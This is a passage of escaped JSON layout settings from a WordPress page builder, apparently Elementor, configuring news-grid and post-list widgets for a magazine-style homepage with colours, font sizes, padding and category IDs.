main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLink